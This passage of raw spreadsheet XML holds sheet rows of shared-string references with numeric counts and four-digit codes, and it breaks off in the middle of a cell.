    <row r="20072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20072" t="s">
        <v>16228</v>
      </c>
      <c r="B20072" t="s">
        <v>16211</v>
      </c>
      <c r="C20072">
        <v>0</v>
      </c>
      <c r="D20072">
        <v>5660</v>
      </c>
    </row>
    <row r="20073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20073" t="s">
        <v>16231</v>
      </c>
      <c r="B20073" t="s">
        <v>16212</v>
      </c>
      <c r="C20073">
        <v>0</v>
      </c>
      <c r="D20073">
        <v>5660</v>
      </c>
    </row>
    <row r="20074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20074" t="s">
        <v>16228</v>
      </c>
      <c r="B20074" t="s">
        <v>16213</v>
      </c>
      <c r="C20074">
        <v>0</v>
      </c>
      <c r="D20074">
        <v>5660</v>
      </c>
    </row>
    <row r="20075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20075" t="s">
        <v>16231</v>
      </c>
      <c r="B20075" t="s">
        <v>16214</v>
      </c>
      <c r="C20075">
        <v>0</v>
      </c>
      <c r="D20075">
        <v>5660</v>
      </c>
    </row>
    <row r="20076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20076" t="s">
        <v>16228</v>
      </c>
      <c r="B20076" t="s">
        <v>16215</v>
      </c>
      <c r="C20076">
        <v>0</v>
      </c>
      <c r="D20076">
        <v>5660</v>
      </c>
    </row>
    <row r="20077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20077" t="s">
        <v>16231</v>
      </c>
      <c r="B20077" t="s">
        <v>16216</v>
      </c>
      <c r="C20077">
        <v>1</v>
      </c>
      <c r="D20077">
        <v>5660</v>
      </c>
    </row>
    <row r="20078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20078" t="s">
        <v>16228</v>
      </c>
      <c r="B20078" t="s">
        <v>16217</v>
      </c>
      <c r="C20078">
        <v>1</v>
      </c>
      <c r="D20078">
        <v>5660</v>
      </c>
    </row>
    <row r="20079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20079" t="s">
        <v>16231</v>
      </c>
      <c r="B20079" t="s">
        <v>16218</v>
      </c>
      <c r="C20079">
        <v>7</v>
      </c>
      <c r="D20079">
        <v>5660</v>
      </c>
    </row>
    <row r="20080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20080" t="s">
        <v>16229</v>
      </c>
      <c r="B20080" t="s">
        <v>16219</v>
      </c>
      <c r="C20080">
        <v>0</v>
      </c>
      <c r="D20080">
        <v>5660</v>
      </c>
    </row>
    <row r="20081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20081" t="s">
        <v>16230</v>
      </c>
      <c r="B20081" t="s">
        <v>16220</v>
      </c>
      <c r="C20081">
        <v>0</v>
      </c>
      <c r="D20081">
        <v>5660</v>
      </c>
    </row>
    <row r="20082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20082" t="s">
        <v>16229</v>
      </c>
      <c r="B20082" t="s">
        <v>16221</v>
      </c>
      <c r="C20082">
        <v>0</v>
      </c>
      <c r="D20082">
        <v>5660</v>
      </c>
    </row>
    <row r="20083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20083" t="s">
        <v>16230</v>
      </c>
      <c r="B20083" t="s">
        <v>16222</v>
      </c>
      <c r="C20083">
        <v>0</v>
      </c>
      <c r="D20083">
        <v>5660</v>
      </c>
    </row>
    <row r="20084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20084" t="s">
        <v>16223</v>
      </c>
      <c r="B20084" t="s">
        <v>16223</v>
      </c>
      <c r="C20084">
        <v>4</v>
      </c>
      <c r="D20084">
        <v>5660</v>
      </c>
    </row>
    <row r="20085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20085" t="s">
        <v>16224</v>
      </c>
      <c r="B20085" t="s">
        <v>16224</v>
      </c>
      <c r="C20085">
        <v>1</v>
      </c>
      <c r="D20085">
        <v>5660</v>
      </c>
    </row>
    <row r="20086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20086" t="s">
        <v>16223</v>
      </c>
      <c r="B20086" t="s">
        <v>16223</v>
      </c>
      <c r="C20086">
        <v>16</v>
      </c>
      <c r="D20086">
        <v>5660</v>
      </c>
    </row>
    <row r="20087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20087" t="s">
        <v>16228</v>
      </c>
      <c r="B20087" t="s">
        <v>16211</v>
      </c>
      <c r="C20087">
        <v>1</v>
      </c>
      <c r="D20087">
        <v>5590</v>
      </c>
    </row>
    <row r="20088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20088" t="s">
        <v>16231</v>
      </c>
      <c r="B20088" t="s">
        <v>16212</v>
      </c>
      <c r="C20088">
        <v>4</v>
      </c>
      <c r="D20088">
        <v>5590</v>
      </c>
    </row>
    <row r="20089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20089" t="s">
        <v>16228</v>
      </c>
      <c r="B20089" t="s">
        <v>16213</v>
      </c>
      <c r="C20089">
        <v>43</v>
      </c>
      <c r="D20089">
        <v>5590</v>
      </c>
    </row>
    <row r="20090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20090" t="s">
        <v>16231</v>
      </c>
      <c r="B20090" t="s">
        <v>16214</v>
      </c>
      <c r="C20090">
        <v>79</v>
      </c>
      <c r="D20090">
        <v>5590</v>
      </c>
    </row>
    <row r="20091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20091" t="s">
        <v>16228</v>
      </c>
      <c r="B20091" t="s">
        <v>16215</v>
      </c>
      <c r="C20091">
        <v>1</v>
      </c>
      <c r="D20091">
        <v>5590</v>
      </c>
    </row>
    <row r="20092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20092" t="s">
        <v>16231</v>
      </c>
      <c r="B20092" t="s">
        <v>16216</v>
      </c>
      <c r="C20092">
        <v>2</v>
      </c>
      <c r="D20092">
        <v>5590</v>
      </c>
    </row>
    <row r="20093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20093" t="s">
        <v>16228</v>
      </c>
      <c r="B20093" t="s">
        <v>16217</v>
      </c>
      <c r="C20093">
        <v>9</v>
      </c>
      <c r="D20093">
        <v>5590</v>
      </c>
    </row>
    <row r="20094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20094" t="s">
        <v>16231</v>
      </c>
      <c r="B20094" t="s">
        <v>16218</v>
      </c>
      <c r="C20094">
        <v>1</v>
      </c>
      <c r="D20094">
        <v>5590</v>
      </c>
    </row>
    <row r="20095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20095" t="s">
        <v>16229</v>
      </c>
      <c r="B20095" t="s">
        <v>16219</v>
      </c>
      <c r="C20095">
        <v>0</v>
      </c>
      <c r="D20095">
        <v>5590</v>
      </c>
    </row>
    <row r="20096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20096" t="s">
        <v>16230</v>
      </c>
      <c r="B20096" t="s">
        <v>16220</v>
      </c>
      <c r="C20096">
        <v>2</v>
      </c>
      <c r="D20096">
        <v>5590</v>
      </c>
    </row>
    <row r="20097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20097" t="s">
        <v>16229</v>
      </c>
      <c r="B20097" t="s">
        <v>16221</v>
      </c>
      <c r="C20097">
        <v>18</v>
      </c>
      <c r="D20097">
        <v>5590</v>
      </c>
    </row>
    <row r="20098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20098" t="s">
        <v>16230</v>
      </c>
      <c r="B20098" t="s">
        <v>16222</v>
      </c>
      <c r="C20098">
        <v>68</v>
      </c>
      <c r="D20098">
        <v>5590</v>
      </c>
    </row>
    <row r="20099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20099" t="s">
        <v>16223</v>
      </c>
      <c r="B20099" t="s">
        <v>16223</v>
      </c>
      <c r="C20099">
        <v>26</v>
      </c>
      <c r="D20099">
        <v>5590</v>
      </c>
    </row>
    <row r="20100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20100" t="s">
        <v>16224</v>
      </c>
      <c r="B20100" t="s">
        <v>16224</v>
      </c>
      <c r="C20100">
        <v>1</v>
      </c>
      <c r="D20100">
        <v>5590</v>
      </c>
    </row>
    <row r="20101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20101" t="s">
        <v>16228</v>
      </c>
      <c r="B20101" t="s">
        <v>16211</v>
      </c>
      <c r="C20101">
        <v>0</v>
      </c>
      <c r="D20101">
        <v>5646</v>
      </c>
    </row>
    <row r="20102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20102" t="s">
        <v>16231</v>
      </c>
      <c r="B20102" t="s">
        <v>16212</v>
      </c>
      <c r="C20102">
        <v>0</v>
      </c>
      <c r="D20102">
        <v>5646</v>
      </c>
    </row>
    <row r="20103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20103" t="s">
        <v>16228</v>
      </c>
      <c r="B20103" t="s">
        <v>16213</v>
      </c>
      <c r="C20103">
        <v>0</v>
      </c>
      <c r="D20103">
        <v>5646</v>
      </c>
    </row>
    <row r="20104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20104" t="s">
        <v>16231</v>
      </c>
      <c r="B20104" t="s">
        <v>16214</v>
      </c>
      <c r="C20104">
        <v>0</v>
      </c>
      <c r="D20104">
        <v>5646</v>
      </c>
    </row>
    <row r="20105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20105" t="s">
        <v>16228</v>
      </c>
      <c r="B20105" t="s">
        <v>16215</v>
      </c>
      <c r="C20105">
        <v>0</v>
      </c>
      <c r="D20105">
        <v>5646</v>
      </c>
    </row>
    <row r="20106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20106" t="s">
        <v>16231</v>
      </c>
      <c r="B20106" t="s">
        <v>16216</v>
      </c>
      <c r="C20106">
        <v>0</v>
      </c>
      <c r="D20106">
        <v>5646</v>
      </c>
    </row>
    <row r="20107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20107" t="s">
        <v>16228</v>
      </c>
      <c r="B20107" t="s">
        <v>16217</v>
      </c>
      <c r="C20107">
        <v>1</v>
      </c>
      <c r="D20107">
        <v>5646</v>
      </c>
    </row>
    <row r="20108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20108" t="s">
        <v>16231</v>
      </c>
      <c r="B20108" t="s">
        <v>16218</v>
      </c>
      <c r="C20108">
        <v>1</v>
      </c>
      <c r="D20108">
        <v>5646</v>
      </c>
    </row>
    <row r="20109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20109" t="s">
        <v>16229</v>
      </c>
      <c r="B20109" t="s">
        <v>16219</v>
      </c>
      <c r="C20109">
        <v>0</v>
      </c>
      <c r="D20109">
        <v>5646</v>
      </c>
    </row>
    <row r="20110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20110" t="s">
        <v>16230</v>
      </c>
      <c r="B20110" t="s">
        <v>16220</v>
      </c>
      <c r="C20110">
        <v>0</v>
      </c>
      <c r="D20110">
        <v>5646</v>
      </c>
    </row>
    <row r="20111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20111" t="s">
        <v>16229</v>
      </c>
      <c r="B20111" t="s">
        <v>16221</v>
      </c>
      <c r="C20111">
        <v>0</v>
      </c>
      <c r="D20111">
        <v>5646</v>
      </c>
    </row>
    <row r="20112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20112" t="s">
        <v>16230</v>
      </c>
      <c r="B20112" t="s">
        <v>16222</v>
      </c>
      <c r="C20112">
        <v>3</v>
      </c>
      <c r="D20112">
        <v>5646</v>
      </c>
    </row>
    <row r="20113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20113" t="s">
        <v>16223</v>
      </c>
      <c r="B20113" t="s">
        <v>16223</v>
      </c>
      <c r="C20113">
        <v>25</v>
      </c>
      <c r="D20113">
        <v>5646</v>
      </c>
    </row>
    <row r="20114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20114" t="s">
        <v>16224</v>
      </c>
      <c r="B20114" t="s">
        <v>16224</v>
      </c>
      <c r="C20114">
        <v>1</v>
      </c>
      <c r="D20114">
        <v>5646</v>
      </c>
    </row>
    <row r="20115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20115" t="s">
        <v>16228</v>
      </c>
      <c r="B20115" t="s">
        <v>16211</v>
      </c>
      <c r="C20115">
        <v>0</v>
      </c>
      <c r="D20115">
        <v>5216</v>
      </c>
    </row>
    <row r="20116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20116" t="s">
        <v>16231</v>
      </c>
      <c r="B20116" t="s">
        <v>16212</v>
      </c>
      <c r="C20116">
        <v>0</v>
      </c>
      <c r="D20116">
        <v>5216</v>
      </c>
    </row>
    <row r="20117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20117" t="s">
        <v>16228</v>
      </c>
      <c r="B20117" t="s">
        <v>16213</v>
      </c>
      <c r="C20117">
        <v>0</v>
      </c>
      <c r="D20117">
        <v>5216</v>
      </c>
    </row>
    <row r="20118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20118" t="s">
        <v>16231</v>
      </c>
      <c r="B20118" t="s">
        <v>16214</v>
      </c>
      <c r="C20118">
        <v>0</v>
      </c>
      <c r="D20118">
        <v>5216</v>
      </c>
    </row>
    <row r="20119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20119" t="s">
        <v>16228</v>
      </c>
      <c r="B20119" t="s">
        <v>16215</v>
      </c>
      <c r="C20119">
        <v>5</v>
      </c>
      <c r="D20119">
        <v>5216</v>
      </c>
    </row>
    <row r="20120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20120" t="s">
        <v>16231</v>
      </c>
      <c r="B20120" t="s">
        <v>16216</v>
      </c>
      <c r="C20120">
        <v>2</v>
      </c>
      <c r="D20120">
        <v>5216</v>
      </c>
    </row>
    <row r="20121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20121" t="s">
        <v>16228</v>
      </c>
      <c r="B20121" t="s">
        <v>16217</v>
      </c>
      <c r="C20121">
        <v>2</v>
      </c>
      <c r="D20121">
        <v>5216</v>
      </c>
    </row>
    <row r="20122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20122" t="s">
        <v>16231</v>
      </c>
      <c r="B20122" t="s">
        <v>16218</v>
      </c>
      <c r="C20122">
        <v>0</v>
      </c>
      <c r="D20122">
        <v>5216</v>
      </c>
    </row>
    <row r="20123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20123" t="s">
        <v>16229</v>
      </c>
      <c r="B20123" t="s">
        <v>16219</v>
      </c>
      <c r="C20123">
        <v>0</v>
      </c>
      <c r="D20123">
        <v>5216</v>
      </c>
    </row>
    <row r="20124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20124" t="s">
        <v>16230</v>
      </c>
      <c r="B20124" t="s">
        <v>16220</v>
      </c>
      <c r="C20124">
        <v>0</v>
      </c>
      <c r="D20124">
        <v>5216</v>
      </c>
    </row>
    <row r="20125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20125" t="s">
        <v>16229</v>
      </c>
      <c r="B20125" t="s">
        <v>16221</v>
      </c>
      <c r="C20125">
        <v>0</v>
      </c>
      <c r="D20125">
        <v>5216</v>
      </c>
    </row>
    <row r="20126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20126" t="s">
        <v>16230</v>
      </c>
      <c r="B20126" t="s">
        <v>16222</v>
      </c>
      <c r="C20126">
        <v>0</v>
      </c>
      <c r="D20126">
        <v>5216</v>
      </c>
    </row>
    <row r="20127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20127" t="s">
        <v>16223</v>
      </c>
      <c r="B20127" t="s">
        <v>16223</v>
      </c>
      <c r="C20127">
        <v>24</v>
      </c>
      <c r="D20127">
        <v>5216</v>
      </c>
    </row>
    <row r="20128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20128" t="s">
        <v>16224</v>
      </c>
      <c r="B20128" t="s">
        <v>16224</v>
      </c>
      <c r="C20128">
        <v>1</v>
      </c>
      <c r="D20128">
        <v>5216</v>
      </c>
    </row>
    <row r="20129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20129" t="s">
        <v>16228</v>
      </c>
      <c r="B20129" t="s">
        <v>16211</v>
      </c>
      <c r="C20129">
        <v>0</v>
      </c>
      <c r="D20129">
        <v>1844</v>
      </c>
    </row>
    <row r="20130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20130" t="s">
        <v>16231</v>
      </c>
      <c r="B20130" t="s">
        <v>16212</v>
      </c>
      <c r="C20130">
        <v>0</v>
      </c>
      <c r="D20130">
        <v>1844</v>
      </c>
    </row>
    <row r="20131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20131" t="s">
        <v>16228</v>
      </c>
      <c r="B20131" t="s">
        <v>16213</v>
      </c>
      <c r="C20131">
        <v>0</v>
      </c>
      <c r="D20131">
        <v>1844</v>
      </c>
    </row>
    <row r="20132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20132" t="s">
        <v>16231</v>
      </c>
      <c r="B20132" t="s">
        <v>16214</v>
      </c>
      <c r="C20132">
        <v>0</v>
      </c>
      <c r="D20132">
        <v>1844</v>
      </c>
    </row>
    <row r="20133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20133" t="s">
        <v>16228</v>
      </c>
      <c r="B20133" t="s">
        <v>16215</v>
      </c>
      <c r="C20133">
        <v>0</v>
      </c>
      <c r="D20133">
        <v>1844</v>
      </c>
    </row>
    <row r="20134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20134" t="s">
        <v>16231</v>
      </c>
      <c r="B20134" t="s">
        <v>16216</v>
      </c>
      <c r="C20134">
        <v>1</v>
      </c>
      <c r="D20134">
        <v>1844</v>
      </c>
    </row>
    <row r="20135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20135" t="s">
        <v>16228</v>
      </c>
      <c r="B20135" t="s">
        <v>16217</v>
      </c>
      <c r="C20135">
        <v>0</v>
      </c>
      <c r="D20135">
        <v>1844</v>
      </c>
    </row>
    <row r="20136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20136" t="s">
        <v>16231</v>
      </c>
      <c r="B20136" t="s">
        <v>16218</v>
      </c>
      <c r="C20136">
        <v>1</v>
      </c>
      <c r="D20136">
        <v>1844</v>
      </c>
    </row>
    <row r="20137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20137" t="s">
        <v>16229</v>
      </c>
      <c r="B20137" t="s">
        <v>16219</v>
      </c>
      <c r="C20137">
        <v>0</v>
      </c>
      <c r="D20137">
        <v>1844</v>
      </c>
    </row>
    <row r="20138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20138" t="s">
        <v>16230</v>
      </c>
      <c r="B20138" t="s">
        <v>16220</v>
      </c>
      <c r="C20138">
        <v>3</v>
      </c>
      <c r="D20138">
        <v>1844</v>
      </c>
    </row>
    <row r="20139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20139" t="s">
        <v>16229</v>
      </c>
      <c r="B20139" t="s">
        <v>16221</v>
      </c>
      <c r="C20139">
        <v>40</v>
      </c>
      <c r="D20139">
        <v>1844</v>
      </c>
    </row>
    <row r="20140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20140" t="s">
        <v>16230</v>
      </c>
      <c r="B20140" t="s">
        <v>16222</v>
      </c>
      <c r="C20140">
        <v>29</v>
      </c>
      <c r="D20140">
        <v>1844</v>
      </c>
    </row>
    <row r="20141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20141" t="s">
        <v>16223</v>
      </c>
      <c r="B20141" t="s">
        <v>16223</v>
      </c>
      <c r="C20141">
        <v>26</v>
      </c>
      <c r="D20141">
        <v>1844</v>
      </c>
    </row>
    <row r="20142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20142" t="s">
        <v>16224</v>
      </c>
      <c r="B20142" t="s">
        <v>16224</v>
      </c>
      <c r="C20142">
        <v>1</v>
      </c>
      <c r="D20142">
        <v>1844</v>
      </c>
    </row>
    <row r="20143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20143" t="s">
        <v>16228</v>
      </c>
      <c r="B20143" t="s">
        <v>16211</v>
      </c>
      <c r="C20143">
        <v>0</v>
      </c>
      <c r="D20143">
        <v>5644</v>
      </c>
    </row>
    <row r="20144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20144" t="s">
        <v>16231</v>
      </c>
      <c r="B20144" t="s">
        <v>16212</v>
      </c>
      <c r="C20144">
        <v>0</v>
      </c>
      <c r="D20144">
        <v>5644</v>
      </c>
    </row>
    <row r="20145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20145" t="s">
        <v>16228</v>
      </c>
      <c r="B20145" t="s">
        <v>16213</v>
      </c>
      <c r="C20145">
        <v>1</v>
      </c>
      <c r="D20145">
        <v>5644</v>
      </c>
    </row>
    <row r="20146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20146" t="s">
        <v>16231</v>
      </c>
      <c r="B20146" t="s">
        <v>16214</v>
      </c>
      <c r="C20146">
        <v>0</v>
      </c>
      <c r="D20146">
        <v>5644</v>
      </c>
    </row>
    <row r="20147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20147" t="s">
        <v>16228</v>
      </c>
      <c r="B20147" t="s">
        <v>16215</v>
      </c>
      <c r="C20147">
        <v>0</v>
      </c>
      <c r="D20147">
        <v>5644</v>
      </c>
    </row>
    <row r="20148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20148" t="s">
        <v>16231</v>
      </c>
      <c r="B20148" t="s">
        <v>16216</v>
      </c>
      <c r="C20148">
        <v>1</v>
      </c>
      <c r="D20148">
        <v>5644</v>
      </c>
    </row>
    <row r="20149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20149" t="s">
        <v>16228</v>
      </c>
      <c r="B20149" t="s">
        <v>16217</v>
      </c>
      <c r="C20149">
        <v>0</v>
      </c>
      <c r="D20149">
        <v>5644</v>
      </c>
    </row>
    <row r="20150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20150" t="s">
        <v>16231</v>
      </c>
      <c r="B20150" t="s">
        <v>16218</v>
      </c>
      <c r="C20150">
        <v>0</v>
      </c>
      <c r="D20150">
        <v>5644</v>
      </c>
    </row>
    <row r="20151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20151" t="s">
        <v>16229</v>
      </c>
      <c r="B20151" t="s">
        <v>16219</v>
      </c>
      <c r="C20151">
        <v>0</v>
      </c>
      <c r="D20151">
        <v>5644</v>
      </c>
    </row>
    <row r="20152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20152" t="s">
        <v>16230</v>
      </c>
      <c r="B20152" t="s">
        <v>16220</v>
      </c>
      <c r="C20152">
        <v>0</v>
      </c>
      <c r="D20152">
        <v>5644</v>
      </c>
    </row>
    <row r="20153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20153" t="s">
        <v>16229</v>
      </c>
      <c r="B20153" t="s">
        <v>16221</v>
      </c>
      <c r="C20153">
        <v>0</v>
      </c>
      <c r="D20153">
        <v>5644</v>
      </c>
    </row>
    <row r="20154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20154" t="s">
        <v>16230</v>
      </c>
      <c r="B20154" t="s">
        <v>16222</v>
      </c>
      <c r="C20154">
        <v>0</v>
      </c>
      <c r="D20154">
        <v>5644</v>
      </c>
    </row>
    <row r="20155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20155" t="s">
        <v>16223</v>
      </c>
      <c r="B20155" t="s">
        <v>16223</v>
      </c>
      <c r="C20155">
        <v>8</v>
      </c>
      <c r="D20155">
        <v>5644</v>
      </c>
    </row>
    <row r="20156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20156" t="s">
        <v>16224</v>
      </c>
      <c r="B20156" t="s">
        <v>16224</v>
      </c>
      <c r="C20156">
        <v>0</v>
      </c>
      <c r="D20156">
        <v>5644</v>
      </c>
    </row>
    <row r="20157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20157" t="s">
        <v>16228</v>
      </c>
      <c r="B20157" t="s">
        <v>16211</v>
      </c>
      <c r="C20157">
        <v>0</v>
      </c>
      <c r="D20157">
        <v>5625</v>
      </c>
    </row>
    <row r="20158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20158" t="s">
        <v>16231</v>
      </c>
      <c r="B20158" t="s">
        <v>16212</v>
      </c>
      <c r="C20158">
        <v>0</v>
      </c>
      <c r="D20158">
        <v>5625</v>
      </c>
    </row>
    <row r="20159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20159" t="s">
        <v>16228</v>
      </c>
      <c r="B20159" t="s">
        <v>16213</v>
      </c>
      <c r="C20159">
        <v>0</v>
      </c>
      <c r="D20159">
        <v>5625</v>
      </c>
    </row>
    <row r="20160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20160" t="s">
        <v>16231</v>
      </c>
      <c r="B20160" t="s">
        <v>16214</v>
      </c>
      <c r="C20160">
        <v>0</v>
      </c>
      <c r="D20160">
        <v>5625</v>
      </c>
    </row>
    <row r="20161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20161" t="s">
        <v>16228</v>
      </c>
      <c r="B20161" t="s">
        <v>16215</v>
      </c>
      <c r="C20161">
        <v>1</v>
      </c>
      <c r="D20161">
        <v>5625</v>
      </c>
    </row>
    <row r="20162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20162" t="s">
        <v>16231</v>
      </c>
      <c r="B20162" t="s">
        <v>16216</v>
      </c>
      <c r="C20162">
        <v>1</v>
      </c>
      <c r="D20162">
        <v>5625</v>
      </c>
    </row>
    <row r="20163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20163" t="s">
        <v>16228</v>
      </c>
      <c r="B20163" t="s">
        <v>16217</v>
      </c>
      <c r="C20163">
        <v>0</v>
      </c>
      <c r="D20163">
        <v>5625</v>
      </c>
    </row>
    <row r="20164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20164" t="s">
        <v>16231</v>
      </c>
      <c r="B20164" t="s">
        <v>16218</v>
      </c>
      <c r="C20164">
        <v>0</v>
      </c>
      <c r="D20164">
        <v>5625</v>
      </c>
    </row>
    <row r="20165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20165" t="s">
        <v>16229</v>
      </c>
      <c r="B20165" t="s">
        <v>16219</v>
      </c>
      <c r="C20165">
        <v>0</v>
      </c>
      <c r="D20165">
        <v>5625</v>
      </c>
    </row>
    <row r="20166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20166" t="s">
        <v>16230</v>
      </c>
      <c r="B20166" t="s">
        <v>16220</v>
      </c>
      <c r="C20166">
        <v>0</v>
      </c>
      <c r="D20166">
        <v>5625</v>
      </c>
    </row>
    <row r="20167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20167" t="s">
        <v>16229</v>
      </c>
      <c r="B20167" t="s">
        <v>16221</v>
      </c>
      <c r="C20167">
        <v>0</v>
      </c>
      <c r="D20167">
        <v>5625</v>
      </c>
    </row>
    <row r="20168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20168" t="s">
        <v>16230</v>
      </c>
      <c r="B20168" t="s">
        <v>16222</v>
      </c>
      <c r="C20168">
        <v>0</v>
      </c>
      <c r="D20168">
        <v>5625</v>
      </c>
    </row>
    <row r="20169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20169" t="s">
        <v>16223</v>
      </c>
      <c r="B20169" t="s">
        <v>16223</v>
      </c>
      <c r="C20169">
        <v>8</v>
      </c>
      <c r="D20169">
        <v>5625</v>
      </c>
    </row>
    <row r="20170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20170" t="s">
        <v>16224</v>
      </c>
      <c r="B20170" t="s">
        <v>16224</v>
      </c>
      <c r="C20170">
        <v>0</v>
      </c>
      <c r="D20170">
        <v>5625</v>
      </c>
    </row>
    <row r="20171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20171" t="s">
        <v>16228</v>
      </c>
      <c r="B20171" t="s">
        <v>16213</v>
      </c>
      <c r="C20171">
        <v>0</v>
      </c>
      <c r="D20171">
        <v>5644</v>
      </c>
    </row>
    <row r="20172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20172" t="s">
        <v>16228</v>
      </c>
      <c r="B20172" t="s">
        <v>16215</v>
      </c>
      <c r="C20172">
        <v>1</v>
      </c>
      <c r="D20172">
        <v>5644</v>
      </c>
    </row>
    <row r="20173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20173" t="s">
        <v>16228</v>
      </c>
      <c r="B20173" t="s">
        <v>16215</v>
      </c>
      <c r="C20173">
        <v>0</v>
      </c>
      <c r="D20173">
        <v>5625</v>
      </c>
    </row>
    <row r="20174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20174" t="s">
        <v>16231</v>
      </c>
      <c r="B20174" t="s">
        <v>16216</v>
      </c>
      <c r="C20174">
        <v>0</v>
      </c>
      <c r="D20174">
        <v>5625</v>
      </c>
    </row>
    <row r="20175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20175" t="s">
        <v>16231</v>
      </c>
      <c r="B20175" t="s">
        <v>16218</v>
      </c>
      <c r="C20175">
        <v>4</v>
      </c>
      <c r="D20175">
        <v>5625</v>
      </c>
    </row>
    <row r="20176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20176" t="s">
        <v>16230</v>
      </c>
      <c r="B20176" t="s">
        <v>16222</v>
      </c>
      <c r="C20176">
        <v>10</v>
      </c>
      <c r="D20176">
